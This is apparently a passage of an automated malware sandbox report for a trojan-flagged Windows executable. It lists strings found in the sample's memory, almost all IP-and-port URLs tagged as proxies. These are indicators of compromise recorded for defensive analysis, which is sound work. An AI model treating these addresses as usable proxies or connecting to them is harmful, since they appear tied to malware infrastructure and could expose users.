                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.181.132.183:6161://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.181.141.70:6467
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6E15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.181.141.70:6467://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.181.148.187:6047
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.181.148.187:6047://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.181.148.187:6047x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.181.161.81:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.181.161.81:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.181.168.145:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.181.168.145:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.161.128.43
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.161.128.43://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.161.128.43:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.177.248.207:8118
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.177.248.207:8118://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.177.248.33:8118
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.177.248.33:8118://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.181.133.59:28916
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.181.133.59:28916://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.26.234.210:9050
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.26.234.210:9050://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7069000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.61.168.184:44722
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7069000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://108.61.168.184:44722://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.104.187.212:41890
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.104.187.212:41890://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C92E6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C92A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.107.181.245:30052
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C92D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.107.181.245:30052://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.107.181.245:32578
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.107.181.245:32578://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C782D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.107.181.245:32855
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7846000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.107.181.245:32855://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.107.181.245:33042
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.107.181.245:33042://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9115000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8ED1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.107.181.245:33056
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8ED8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.107.181.245:33056://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.107.181.245:33070
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.107.181.245:33070://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.107.181.245:33190
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.107.181.245:33190://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.107.181.245:34288
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.107.181.245:34288://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.111.212.78:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.111.212.78:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6951000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.122.195.16
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6942000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.122.195.16://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C692A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.122.195.16:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6566000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.123.227.193:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.123.227.193:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.123.231.232:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.123.231.232:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.123.253.20:53266
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.123.253.20:53266://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C94A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.123.254.43:12339
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.123.254.43:12339://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.123.254.43:14474
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.123.254.43:14474://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD0E5000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.123.254.43:18072
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.123.254.43:18072://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.123.254.43:24210
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.123.254.43:24210://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.123.254.43:31167
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.123.254.43:31167://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.123.254.43:34476
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.123.254.43:34476://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.123.254.43:36076
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.123.254.43:36076://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7568000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7596000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.123.254.43:40667
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7586000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.123.254.43:40667://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC30D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC13D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.123.254.43:41049
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC152000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.123.254.43:41049://proxyxD
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8523000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C83BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.123.254.43:42048
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C68A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.123.254.43:42048://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C63C5000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.123.254.43:51584
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.123.254.43:51584://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.123.254.43:51856
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.123.254.43:51856://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CADAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.123.254.43:58917
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CADAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.123.254.43:58917://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.123.254.43:62183
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.123.254.43:62183://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC61F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.123.254.43:9066
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC61F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.123.254.43:9066://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.125.132.244:30319://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6D7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.125.132.244:30319x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.167.134.253:44788
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.167.134.253:44788://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.172.81.102:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.172.81.102:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.194.22.61:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.194.22.61:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.195.98.207://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.195.98.207:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6895000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.195.98.207x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CABC8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBBA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.201.14.82:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAC38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.201.14.82:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.205.181.27:15737
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.205.181.27:15737://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.205.181.27:16296
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.205.181.27:16296://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.205.181.27:2419
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.205.181.27:2419://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA4FF000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAF21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.205.181.27:25783
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA4FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.205.181.27:25783://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6942000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.205.181.27:48977
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.205.181.27:48977://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.205.181.27:7663
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.205.181.27:7663://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.234.37.16:34003
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.234.37.16:34003://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.236.47.242:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.236.47.242:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C66E1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6779000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.238.12.156:1163
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C66E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.238.12.156:1163://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAFAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.238.12.156:22472
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAFAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.238.12.156:22472://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.238.12.156:26770
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.238.12.156:26770://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.238.12.156:27241
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.238.12.156:27241://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.238.12.156:29834
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.238.12.156:29834://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.238.12.156:46962
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.238.12.156:46962://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.238.12.156:55724
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.238.12.156:55724://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.238.12.156:61743
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.238.12.156:61743://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6CAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.24.132.215:3131
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6CAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.24.132.215:3131://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.247.104.237
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.247.104.237://proxy
